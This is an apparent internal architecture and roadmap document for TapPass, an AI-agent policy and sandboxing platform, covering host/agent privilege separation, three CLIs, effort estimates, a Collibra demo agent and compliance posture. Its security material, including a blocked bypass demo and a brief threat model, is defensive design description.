13.1 Privilege separation between host and agent

Section titled “13.1 Privilege separation between host and agent”

tappass-host runs as a privileged daemon (mTLS cert, namespace/Landlock/cgroup capabilities). The agent runs unprivileged. The Compiled Policy file (keyring.json) is written by host, mounted read-only into the agent's namespace, watched by the agent via inotify but never written by it.

There is no API on tappass-agent that asks TapPass for more capabilities. Sync is unidirectional. Enforced by:

  • Package design: tappass-agent exposes no client classes for admin endpoints.
  • Transport: kernel-ring egress allowlist blocks anything not in the Compiled Policy's URL set.
  • Authentication: the agent's tokens have no admin scope.

A first-class attacker who owns the agent process cannot: modify the Compiled Policy, forge a sync payload, reach admin endpoints, replay older Compiled Policy versions, read other sandboxes. They can: use current tokens until expiry (~5 min), try denied tools (gateway rejects), trip loop_guard.


14. How do we manage three CLIs without confusion?

Section titled “14. How do we manage three CLIs without confusion?”

Three packages, three identities, three audiences. Each persona uses exactly one. No surface does another's job.

CLIPackagePersonaAuthnPrivilege
tappasstappass-cliOperator (CISO, project admin, agent owner)SSO + MFAHigh — defines policy at appropriate cascade level
tappass-hosttappass-hostHost owner (DevOps)Machine identity (mTLS)Medium — applies policy locally
tappass-agenttappass-agentAgent process / devScoped sandbox tokenLowest — read-only consumer
# Operator:
tappass policy apply --level org policies/baseline.rego
tappass policy apply --pack eu-ai-act --level project=eu-team
tappass sandbox-spec emit-bootstrap eu-support-emailer --count 1
# → https://app.tappass.ai/install/abc123
# Host owner:
tappass-host init my-agent --enroll-url https://app.tappass.ai/install/abc123
tappass-host start my-agent --agent <agent-package>
# Anyone:
<agent-cli> run-task <task-name>

tappass — management. Authors policy at any cascade level. Applies compliance packs (tappass policy apply --pack eu-ai-act). Provisions sandbox-specs. Mints bootstraps. Tails audit. Runs evaluation (tappass eval run).

tappass-host — runtime. Consumes bootstrap. Applies the Compiled Policy across the providers in its Runtime. Launches agent. Daemonized variant of tappass exec.

tappass-agent — client SDK + thin debug CLI. Read-only. No enroll, no rotate, no request-scope.

Server-side platform (~6–10 weeks):

#PieceSize
1Policy compiler (with cascade merge) — emits Compiled PolicyL
2Signed sync channelM
3MCP-forward mode in gateway/M
4Per-org MCP-server registryS
5schema_acl, loop_guard pipeline stepsS
6Harness-ring providers (claude-code, codex, cursor, cline, …)S each
7Interpreter-ring provider (monty host-function manifest)S
8Kernel-ring providers (OpenShell + nono Landlock + sandbox-exec)M

CLIs and dashboard (~4–6 weeks):

#PieceSize
9tappass management CLIM
10tappass-host runtime CLI + daemonM
11tappass-agent client SDK + thin CLIS
12Dashboard onboarding wizard (with compliance pack picker)S

Evaluation and packs (~6–10 weeks):

#PieceSize
13Pre-deployment evaluation harness + probe libraryL
14Compliance pack content (EU AI Act, OWASP LLM, GDPR, PCI-DSS, HIPAA, NIS2/DORA)M
15Drift detection engine (baseline + alerting)M

Total: ~16–26 engineering weeks across three workstreams. Workstream 1 (architectural spine, items 1-12) is the prerequisite for items 13-15 to have something to evaluate and observe.


15. What does this look like for a real agent?

Section titled “15. What does this look like for a real agent?”

Reference implementations. Each is a separate repo depending on tappass-agent. Same architecture, different agent task.

15.1 Collibra agent — partner-facing example

Section titled “15.1 Collibra agent — partner-facing example”

tappass/collibra-agent — agent with read-write access to a Collibra catalog. The partner artifact for email-collibra.md (Spoor 1 with Nick at Collibra). End-to-end runnable today via mock Collibra MCP.

collibra-agent/
├── README.md
├── pyproject.toml # depends on: tappass-agent, langchain, langchain-openai
├── agent/
│ ├── main.py # Keyring.load() → Client(kr) → ReAct loop
│ └── tasks/
├── cli/
├── mock_collibra_mcp/ # 3 schemas: customers (RW), finance (RO), pii_archive (DENY)
├── policies/ # SEED policy for the demo
├── eval/ # SEED evaluation probes (Collibra-specific)
├── deploy/
│ └── docker-compose.yaml
└── docs/

Pre-stage:

tappass policy apply --level org policies/acme-baseline.rego
tappass policy apply --pack eu-ai-act --level project=collibra-eval
tappass policy apply --level project=collibra-eval policies/collibra-steward.rego
tappass eval run --agent collibra-agent --policy collibra-steward --packs eu-ai-act
# → eval report shows pass/fail per probe
tappass sandbox-spec emit-bootstrap collibra-steward --count 2
tappass-host init tenant_a --enroll-url <url1>
tappass-host init tenant_b --enroll-url <url2>
tappass-host start tenant_a --agent collibra-agent
tappass-host start tenant_b --agent collibra-agent
tappass-host daemon &

The moments, in order:

  1. Pre-deployment evaluation (Q8). Show tappass eval run output: 47/50 probes pass; 3 failures with replay links. Refine policy, re-run, all pass.
  2. End-to-end runtime baseline (Q2). collibra-agent run-task add-email-column → succeeds. Trace shows five contiguous spans.
  3. Schema access (Q7/Q9). run-task drop-pii-archive → denied at MCP. Audit shows reason, layer, and which cascade level introduced the rule.
  4. Rolled out across Compiled Policies (Q12). Same prompt in tenant_b → same denial.
  5. Live policy change (Q12). Operator: tappass policy apply --level project=collibra-eval policies/strict.rego. tappass-agent watch shows policy_version: 17 → 18. Tool list shrinks. No agent restart.
  6. Loop detection (Q3). run-task clean-up-temp-assets. After 3 deletes, loop_guard kills the session.
  7. Drift detection (Q12). Run a probe sequence that mimics a drifted prompt template. Dashboard alert: "tool-call distribution shifted from baseline."
  8. Bypass attempt (Q9). tappass-host shell tenant_a; curl https://collibra.com/... → blocked at kernel.
  9. Sync security (Q13). python -c "from tappass_agent import Client; Client(...).request_more_scopes()"AttributeError.
  10. Revocation (Q14). tappass sandbox revoke tenant_a → next prompt gets 401 sandbox_revoked.
ShapeTaskLayers exercisedMaps to function
Customer-support emailergmail.send repliesgateway, mcp, harnesscustomer_support_emailer
Code reviewergh PR commentsgateway, mcp, kernelcode_reviewer
Internal knowledge assistantRAG over internal docsgateway, mcpinternal_kb_assistant
Data engineer agentSQL against analytics DBgateway, mcp, codemode, kerneldata_engineer_agent
Refund processorStripe partial refundsgateway, mcp, harnessrefund_processor
Collibra steward (§15.1)Catalog modificationsall five(custom)

Each is a small repo depending only on tappass-agent. None requires changes to TapPass core.


AlternativeWhy this concept is more than that
OPA standaloneOPA evaluates policy. Doesn't compile a Compiled Policy, deliver signed updates, or live alongside the agent at every enforcement position. We use OPA inside TapPass.
Auth0 (any IDP)IDPs issue identity tokens to users. Don't derive aspect-organized Compiled Policies, don't push live updates, don't understand MCP. Mental model rhymes; primitives don't.
Service mesh (Istio, Linkerd)Network-layer policy only — that's our kernel ring, one of five enforcement positions. Customers can keep their mesh; we slot above it.
Provider-side limits (Anthropic, OpenAI)Coarse and per-key. No agent / session / resource concepts. Lock the customer to one provider.
Per-vendor governance (each SaaS)Reproduces the problem: customer manages N governance UIs across N products.
Black-box red-teaming only (Giskard-style)Pre-deployment evaluation is necessary but insufficient — it doesn't enforce at runtime. We do both: §8 evaluation + §9–13 enforcement.
Build it yourself, per agentWhat every agent vendor otherwise has to do. Whole pitch is "don't."

Unique contribution: an aspect-organized Compiled Policy derived from one Rego source (across an org / project / agent cascade), evaluated against an adversarial probe suite before deployment, delivered by signed unidirectional sync at runtime, drift-monitored in production, rendered into native config by per-target providers across 3 rings + 2 cross-cutting layers — all model-provider-agnostic.


What customers ask before architecture matters. Where data lives, what's never used for training, certifications, encryption, residency.

EU buyers (Collibra, regulated industries, public sector) and US enterprise CISOs filter on these properties before the architecture conversation even begins. Stating them explicitly is part of the procurement-defensibility story.

  • 0-training policy. Customer prompts, completions, tool calls, audit data, and policy content are never used to train any model — TapPass-internal or third-party. Provider keys, when used via BYOK, are passed through to the provider; the customer's contract with the provider governs what they do with it.
  • Customer data residency. Two regions at GA: EU (Ireland) and US (Virginia). Policy + audit + Compiled Policy compilation happens in-region. No cross-region data transfer except where the customer's own model provider routes it.
  • Encryption at rest. AES-256 (KMS-envelope; per-org AAD per feedback_byok_llm_keys).
  • Encryption in transit. TLS 1.3 between every component. Sync channel uses mTLS with Ed25519 signing.
  • Customer data deletion. Right-to-erasure honored within 30 days. Audit records sealed at session close (hash-chained); deletion replaces with tombstones rather than gaps to preserve chain integrity.
CertificationStatusTarget
SOC 2 Type 1Roadmap2026 H2 (kicks off after architectural spine ships)
SOC 2 Type 2Roadmap2027 H1
GDPR (Article 28 DPA, Article 30 records, DPIA template)Operational today; trust center has DPA/DPIA/subprocessorsMaintain
EU AI Act readinessCompliance pack ships with this concept (§4.5); audit/risk-management aligned to Article 9–17 requirementsMaintain
ISO 27001Roadmap2027
HIPAA BAAOn request, evaluated case-by-case(depends on customer demand signal)

17.3 Sub-processor and supply-chain disclosure

Section titled “17.3 Sub-processor and supply-chain disclosure”
  • Trust center (trust.tappass.ai) lists every sub-processor (cloud provider, model providers when BYOK isn't used, observability vendors).
  • Every TapPass repo carries an OSS_COMPLIANCE.md mapped to OpenChain ISO/IEC 5230 (per project_oss_license_compliance.md).
  • liccheck + CycloneDX SBOM gates ship in CI for every repo.
  • Logical isolation per org. Per-org AAD on KMS-envelope encryption; per-org policy store; per-org sandbox Compiled Policies cannot cross-read (separate namespaces, separate UIDs, separate sync channels).
  • No shared compute path between tenants. Pipeline execution is per-call and stateless; no in-memory caches that span tenants beyond the per-org cache.
  • Audit cross-tenant isolation. An auditor in org A cannot query org B audit, by transport (separate org_id scoping enforced at the pipeline boundary) and by RBAC.
  • Status page at status.tappass.ai.
  • Public incident database (planned). A RealHarm-equivalent — TapPass-curated catalog of agent failure modes observed across deployments (anonymized), so the broader community can learn from real-world failures. Marketing/community asset; not a product feature.

★★★ blocks the spec, ★★ shapes it, ★ nice-to-have.

  1. ★★★ Multi-machine identity. One enrollment, one sandbox? Confirm vs. customer expectations.
  2. ★★★ tappass-host vs. tappass exec packaging. Separate package, shared core. Confirm during spec.
  3. ★★★ Cascade merge edge cases. Org floor changes after agents are running — re-derive or wait? Project policy contradicts org floor — reject at apply time? Lean: re-derive on any change; reject contradictions at apply. Confirm during spec.
  4. ★★★ Compliance pack maintenance ownership. EU AI Act content evolves; OWASP Top 10 updates yearly. Who owns the bundles? Lean: Compliance team (Product) curates; Engineering reviews technical claims; Legal reviews regulatory mapping. Quarterly review cadence.
  5. ★★★ Pre-deployment evaluation as gate or advisory. Do we require a pass before sandbox-spec emit-bootstrap (block on failure) or report and let the operator decide? Lean: configurable per cascade level — org admin can require eval-pass at org floor for high-risk functions; advisory by default.
  6. ★★ Capability-token authoring UX. Presets vs. raw Rego. Lean: presets first.
  7. ★★ In-flight calls during a policy_version flip. Lean: in-flight completes against old, next uses new.
  8. ★★ Real Collibra MCP roadmap. Confirm with Nick.
  9. ★★ Audit story for layer-disabled sandboxes. Dashboard must show which defenses are not active per sandbox.
  10. ★★ Drift signal sensitivity tuning. Per-sandbox baselines drift naturally — alerting threshold needs care to avoid noise. Lean: per-pack defaults + operator override.
  11. ★ Codemode applicability. The interpreter ring is a no-op for ReAct agents. First-class for code-writing agents.
  12. ★ Pricing/packaging signal. Layered defense + evaluation + compliance packs is more product than chokepoint. Worth a pricing conversation.
  13. ★ Public threat-intelligence asset. RealHarm-equivalent. Marketing, not architecture.

This document is the architectural anchor (vision). Per-piece scope lives at ../components/ — one file per buildable unit, self-contained for subagent dispatch. Two cuts of the same set:

  • Question view (../components/README.md) — components nested by the question they answer (Q3, Q4, Q9, Q10, …).
  • Systems view (../components/SYSTEMS.md) — components grouped by engine (Policy engine, Tool governance engine, Sandbox runtime, Sync system, Operator surfaces, Evaluation engine, Reference implementations, Trust & compliance).

Each component file carries: frontmatter (status, size, owner, dependencies, acceptance criteria), a vision pointer back to this concept, a functional spec, technical design, definition of done, coordination notes, and out-of-scope. A subagent dispatched to "implement X" opens its component file and has everything in one place.

Four specs are the natural deliverables, mapped to the question groupings:

  • tappass-compiled-policy-and-sync.md — policy compiler (with cascade merge) + signed push channel + drift monitor. Answers Q10–Q13.
  • tappass-mcp-proxy.md — MCP-forward + per-org MCP registry + new pipeline steps. Answers Q3, Q7.
  • tappass-clis.md — three CLIs in detail with --level cascade flag, shared OpenShell core. Answers Q14.
  • tappass-evaluation-and-packs.md — pre-deployment evaluation harness + compliance pack scaffolding. Answers Q4 + Q8.

Roadmap and sequencing live at ../roadmap/2026-h2.md.

tappass/collibra-agent (§15.1) — scaffolded once the relevant specs land. Subsequent agents per §15.2 as customer / partner conversations surface.

Trust posture program (SOC 2 Type 1 audit + public trust page expansion) runs in parallel — see ../components/operational/.

This document is the vision; the components are the buildable scope; the roadmap is the time-bound delivery plan; the decisions log (when populated) records why we chose what we chose.